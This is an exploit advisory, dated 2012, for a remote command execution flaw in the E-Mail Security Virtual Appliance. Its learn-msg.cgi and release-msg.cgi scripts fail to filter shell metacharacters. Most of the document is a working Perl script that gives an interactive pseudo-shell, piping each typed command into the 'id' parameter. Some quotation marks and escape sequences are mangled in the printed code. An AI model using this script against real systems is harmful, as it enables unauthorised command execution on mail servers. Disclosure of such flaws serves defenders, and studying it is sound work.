E-Mail Security Virtual Appliance (ESVA) Remote Execution Exploit

Summary

E-Mail Security Virtual Appliance (ESVA) prone to remote execution vulnerability.

Credit:

The information has been provided by iJoo.


Details

Vulnerable Systems:
 * E-Mail Security Virtual Appliance (ESVA)

-=+ Infected Files

…./cgi-bin/learn-msg.cgi
…./cgi-bin/release-msg.cgi

Not found any strips/filter to metacharacters..
Attacker can easily execute command..

-=+ Simple RCE ESVA

#! /usr/bin/perl
use LWP;
use HTTP::Request;
if (@ARGV < 1)
{
print ‘n==========================================n’;
print ‘ ESVA – REMOTE EXECUTION SCRIPT n’;
print ‘==========================================n’;
print ‘Usage: perl esva.pl host (without http://)n’;
print ‘Ex. perl esva.pl www.korban.comn’;
exit;
}
$host=$ARGV[0];
print ‘Try to Execution Command!n’;
print ‘iDSc-shell# ‘;
chomp( $cmd = <STDIN>);
while($cmd !~ ‘exit’)
{
$content = ”;
$ua = LWP::UserAgent->new();
$ua->agent(”);
$request = HTTP::Request->new (GET => ‘http://’.$host.’/cgi-bin/learn-msg.cgi?id=%7c’.$cmd.’%3b’);
$response = $ua->request ($request);
$content = $response->content;
print $content.’n’;
print ‘iDSc-shell# ‘;
chomp( $cmd = <STDIN>);
}

Disclosure Timeline:
Published: 2012-08-16

Categories: Exploits